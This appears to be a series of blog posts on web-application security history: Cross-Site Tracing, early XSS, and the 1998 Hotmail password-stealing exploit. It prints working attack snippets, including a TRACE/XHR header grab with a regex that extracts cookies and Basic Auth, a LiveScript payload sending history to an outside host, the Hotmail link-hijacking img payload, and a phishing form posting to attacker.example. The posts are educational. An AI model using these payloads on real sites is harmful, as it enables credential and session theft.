• In January 2003 Jeremiah Grossman disclosed a method to bypass the HttpOnly1 cookie restriction. He named it Cross-Site Tracing (XST), unwittingly starting a trend to attach “cross-site” to as many web-related vulnerabilities as possible.

    Alas, the “XS” in XST evokes similarity to XSS (Cross-Site Scripting) which has the consequence of leading people to mistake XST as a method for injecting JavaScript. (Thankfully, character encoding attacks have avoided the term Cross-Site Unicode, XSU.) Although XST attacks rely on browser scripting to exploit the flaw, the underlying problem is not the injection of JavaScript. XST is a means for accessing headers normally restricted from JavaScript.

    Confused yet?

    First, let’s review XSS. These vulns, alternately described as HTML injection, occur because a web application echoes an attacker’s payload within the HTTP response body – the HTML. This lets the attacker modify the page’s DOM by injecting characters that change the HTML’s structure, such as brackets (< and >) and quotes (' and ").
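
    For instance, suppose a search page echoes the query, unescaped, into an attribute such as <input type="text" value="...">. Submitting a value like "><script>alert(42)</script> closes the attribute and the tag, leaving markup along these lines (the search field is a hypothetical example):

    <input type="text" value=""><script>alert(42)</script>">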

    Cross-site tracing relies on HTML injection to craft an exploit within the victim’s browser, but this implies that an attacker already has the capability to execute JavaScript. So, XST isn’t about injecting <script> tags into the browser. The attacker must already be able to do that.

    Cross-site tracing takes advantage of the fact that a web server should reflect the client’s HTTP message in its response.2 The common misunderstanding of an XST attack’s goal is that it uses a TRACE request to cause the server to reflect JavaScript in the HTTP response body that the browser would consequently execute. As the following example shows, this is in fact what happens, even though the reflection of JavaScript isn’t the real vulnerability. The green and red text indicates the response body. The request was made with netcat.

    [Image: Cross-site tracing]
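
    Roughly, the exchange looks like this (a reconstruction, not the original capture; test.lab and the exact response headers are placeholders, and the final line is the reflected request):

    $ printf 'TRACE /<script>alert(42)</script> HTTP/1.0\r\n\r\n' | nc test.lab 80
    HTTP/1.1 200 OK
    Content-Type: message/http

    TRACE /<script>alert(42)</script> HTTP/1.0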

    The reflection of <script> tags is immaterial (the RFC even says the server should reflect the request without modification). The real outcome of an XST attack is that it exposes HTTP headers normally inaccessible to JavaScript.

    To reiterate: XST attacks use the TRACE (or synonymous TRACK) method to read HTTP headers that are otherwise blocked from JavaScript access.

    For example, the HttpOnly attribute of a cookie prevents JavaScript from reading that cookie’s properties. The Authorization header, which for HTTP Basic Auth is simply the Base64-encoded username and password, is not part of the DOM and not directly readable by JavaScript.
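
    Both of those protections are just HTTP headers. A hypothetical pair for illustration (the cookie name and value are invented; the Basic value is the classic RFC 2617 example of Aladdin / open sesame):

    Set-Cookie: SESSIONID=abc123; HttpOnly
    Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==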

    No cookie values or auth headers showed up when we made the example request via netcat because we didn’t include any. Netcat doesn’t have the internal state or default headers that a browser does. For comparison, take a look at the server’s response when a browser’s XHR object makes a TRACE request. This is the snippet of JavaScript:

    // Issue a synchronous TRACE request to the target origin.
    var xhr = new XMLHttpRequest();
    xhr.open('TRACE', 'https://test.lab/', false);
    xhr.send(null);
    // If the server answered, display the reflected request, headers included.
    if (200 == xhr.status)
        alert(xhr.responseText);
    

    The following image shows one possible response. (In this scenario, we’ve imagined a site for which the browser has some prior context, including cookies and a login with HTTP Basic Auth.) Notice the text in red. The browser included the Authorization and Cookie headers in the XHR request, and the server reflected them:

    [Image: XST headers]
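
    In text form, the reflected request inside that response body would look something like this (the cookie and credentials are the same invented placeholders as above):

    TRACE / HTTP/1.1
    Host: test.lab
    Cookie: SESSIONID=abc123
    Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==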

    Now we see that both an HTTP Basic Authentication header and a cookie value appear in the response text. A simple JavaScript regex could extract these values, bypassing the normal restrictions imposed on script access to headers or protected cookies. The drawback for attackers is that modern browsers (such as the ones that have moved into this decade) are savvy enough to block TRACE requests through the XMLHttpRequest object, which leaves the attacker to look for alternate capabilities in plug-ins like Flash (which are also now gone from modern browsers).
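
    A sketch of that extraction, reusing the xhr object from the earlier snippet (the header names are the only assumption; everything else is plain string matching):

    // Pull the reflected Authorization and Cookie headers out of the echoed request.
    var auth = xhr.responseText.match(/^Authorization:\s*(.+?)\r?$/m);
    var cookie = xhr.responseText.match(/^Cookie:\s*(.+?)\r?$/m);
    if (auth) alert('Authorization: ' + auth[1]);
    if (cookie) alert('Cookie: ' + cookie[1]);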

    This is the real vulnerability associated with cross-site tracing: peeking at header values. The exploit would be impossible without the ability to inject JavaScript in the first place3. Therefore, its real impact (or threat, depending on how you define these terms) is exposing sensitive header data. Hence, alternate names for XST could be TRACE disclosure, TRACE header reflection, TRACE method injection (TMI), or TRACE header & cookie (THC) attack.

    We’ll see if any of those actually catch on for the next OWASP Top 10 list.


    1. HttpOnly was introduced by Microsoft in Internet Explorer 6 Service Pack 1, which was released September 9, 2002. It was created to mitigate, not block, XSS exploits that explicitly attacked cookie values. It wasn’t a method for preventing HTML injection (aka cross-site scripting or XSS) vulnerabilities from occurring in the first place. Mozilla magnanimously adopted it in Firefox 2.0.0.5 four and a half years later. 

    2. Section 9.8 of the HTTP/1.1 RFC

    3. Security always has nuance. Requesting TRACE /<script>alert(42)</script> HTTP/1.0 will likely be stored in a traffic log file. If some log parsing tool renders requests like this to a web page without filtering the content, then HTML injection once again becomes possible. This is often referred to as second order XSS – when a payload is injected via one application, stored, then rendered by a separate one. 

    • • •
  • The Hacking Web Apps book covers HTML Injection and cross-site scripting (XSS) in Chapter 2. Within the restricted confines of the allotted page count, it describes one of the most pervasive attacks that plagues modern web applications.

    Yet XSS is old. Very, very old. Born in the age of acoustic modems and barely a blink after the creation of the web browser.

    Early descriptions of the attack used terms like “malicious HTML” or “malicious JavaScript” before the phrase “cross-site scripting” became canonized by the OWASP Top 10. While XSS is an easy point of reference, the attack could be more generally called HTML injection because an attack does not have to “cross sites” or rely on JavaScript to be successful. The infamous Samy attack didn’t need to leave the confines of MySpace (nor did it need to access cookies) to effectively DoS the site within 24 hours. Persistent XSS may be just as dangerous if an attacker injects an iframe pointing to a malware site – no JavaScript required.
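
    The payload in that case is nothing more than markup; a hypothetical example (the URL is an invented placeholder):

    <iframe src="http://malware.example/exploit" width="0" height="0"></iframe>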

    Here’s one of the earliest references to the threat of XSS from a message to the comp.sys.acorn.misc newsgroup on June 30, 19961. It mentions only a handful of possible outcomes:

    Another ‘application’ of JavaScript is to poke holes in Netscape’s security. To anyone using old versions of Netscape before 2.01 (including the beta versions) you can be at risk to malicious Javascript pages which can a) nick your history b) nick your email address c) download malicious files into your cache and run them (although you need to be coerced into pressing the button) d) examine your filetree.

    From that message we can go back several months to the announcement of Netscape Navigator 2.0 on September 18, 1995. A month later Netscape created a “Bugs Bounty” starting with its beta release in October. The bounty offered rewards, including a $1,000 first prize, to anyone who discovered and disclosed a security bug within the browser. A few weeks later the results were announced and first prize went to a nascent JavaScript hack.

    The winner of the bug hunt, Scott Weston, posted his find to an Aussie newsgroup. This was almost 15 years ago on December 1, 1995 (note that LiveScript was the precursor to JavaScript):

    The “LiveScript” that I wrote extracts ALL the history of the current netscape window. By history I mean ALL the pages that you have visited to get to my page, it then generates a string of these and forces the Netscape client to load a URL that is a CGI script with the QUERY_STRING set to the users History. The CGI script then adds this information to a log file.

    Scott, faithful to hackerdom tenets, included a pop-culture reference2 in his description of the sensitive data extracted about the unwitting victim:

    - the URL to use to get into CD-NOW as Johnny Mnemonic, including username and password.

    - The exact search params he used on Lycos (i.e. exactly what he searched for)

    - plus any other places he happened to visit.

    HTML injection targets insecure web applications. These were examples of how a successful attack could harm the victim rather than how a web site was hacked. Browser security is important to mitigate the impact of such attacks, but a browser’s fundamental purpose is to parse and execute HTML and JavaScript returned by a web application – a dangerous prospect when the page is laced with malicious content inserted by an attacker.

    The attack is almost indistinguishable from a modern payload. A real attack might have used a subtler <img> or <iframe> rather than changing location.href:

    <SCRIPT LANGUAGE="LiveScript">
    i = 0
    yourHistory = ""
    while (i < history.length) {
      yourHistory += history[i]
      i++;
      if (i < history.length)
        yourHistory += "^"
    }
    location.href = "http://www.tripleg.com.au/cgi-bin/scott/his?" + yourHistory
    <!-- hahah here is the hidden script -->
    </SCRIPT>
    

    The actual exploit reflected the absurd simplicity typical of XSS attacks. They often require little effort to create, but carry a significant impact.

    Before closing let’s take a tangential look at the original $1,000 “Bugs Bounty”. The Chromium team offers $500 and $1,3373 rewards for security-related bugs. The Mozilla Foundation offers $500 and a T-Shirt.

    (In 2023, these amounts reach even higher into the $20,000 and $40,000 range.)

    On the other hand, you can keep the security bug from the browser developers and earn $10,000 and a laptop for a nice, working exploit.

    Come to think of it, those options seem like a superior hourly rate to writing a book.


    1. Netscape Navigator 3.0 was already available in April of the same year. 

    2. Good luck tracking down the May 1981 issue of Omni Magazine in which William Gibson’s short story first appeared! 

    3. No, the extra $337 isn’t the adjustment for inflation from 1995, which would have made it $1,407.72 according to the Bureau of Labor Statistics. It’s a nod to leetspeak. 

    • • •
  • My book starts off with a discussion of cross-site scripting (XSS) attacks along with examples from 2009 that illustrate the simplicity of these attacks and the significant impact they can have. What’s astonishing is how little many of the attacks have changed.

    Consider the following example of HTML injection, over a decade old and from before the term XSS became so ubiquitous. The exploit also appeared about two years before the blanket CERT advisory that called attention to the insecurity of unchecked HTML (CA-2000-02).

    On August 24, 1998 a Canadian web developer, Tom Cervenka, posted a message to the comp.lang.javascript newsgroup that claimed:

    We have just found a serious security hole in Microsoft’s Hotmail service (https://www.hotmail.com/) which allows malicious users to easily steal the passwords of Hotmail users.

    The exploit involves sending an e-mail message that contains embedded javascript code. When a Hotmail user views the message, the javascript code forces the user to re-login to Hotmail. In doing so, the victim’s username and password is sent to the malicious user by e-mail.

    [Image: Hotmail spoof]

    The discoverers flouted the 90s trend to name vulns based on expletives or num3r1c characters and dubbed it simply the “Hot”Mail Exploit.

    (Disclosures of that era also tended to include greetz, typos, and self-aggrandizement that impressed upon the reader the hacker’s near-omnipotent skills. This disclosure failed on most of those aspects. However, the web site demo satisfied an Axiom of Hacking Culture by choosing a hacker handle that referenced pop culture, Blue Adept, a fantasy novel by Piers Anthony.)

    The attack required two steps. First, they set up a page on Geocities (a hosting service for web pages distinguished by being free before free was subsumed by the Web 2.0 label) that spoofed Hotmail’s login.

    The attack wasn’t particularly sophisticated; it didn’t need to be. The login form collected the victim’s credentials and IP address, then mailed them to the newly-created Geocities account.
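
    The page itself could be as plain as a form that mimics the Hotmail login while shipping the fields elsewhere. A purely hypothetical sketch (the field names and collection endpoint are invented, not taken from the original page):

    <!-- Looks like a login form; actually posts to the attacker -->
    <form method="POST" action="http://attacker.example/collect">
      Login Name: <input type="text" name="login"><br>
      Password: <input type="password" name="passwd"><br>
      <input type="submit" value="Sign In">
    </form>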

    The second step involved executing the actual exploit against Hotmail by sending an email with HTML that contained a rather curious img tag (whitespace added for readability of the long, double-quoted string):

    <img src="javascript:errurl='http://www.because-we-can.com/users/anon/hotmail/getmsg.htm';
    nomenulinks=top.submenu.document.links.length;
    for(i=0;i<nomenulinks-1;i++){
      top.submenu.document.links[i].target='work';
      top.submenu.document.links[i].href=errurl;
    }
    noworklinks=top.work.document.links.length;
    for(i=0;i<noworklinks-1;i++){
      top.work.document.links[i].target='work';
      top.work.document.links[i].href=errurl;
    }">
    

    The JavaScript changed the browser’s DOM such that any click would take the victim to the spoofed login page, which would then coax credentials from the unwitting visitor. The original payload didn’t bother to obfuscate the JavaScript inside the src attribute. Modern attacks might use more sophisticated obfuscation techniques and tags other than the img element, but it’s otherwise hard to tell which decade this payload is from.

    The problem of HTML injection, well known for over 10 years, remains a significant attack against web applications. (Another edit from the future: XSS remains a common vuln now almost 25 years after this disclosure.)

    • • •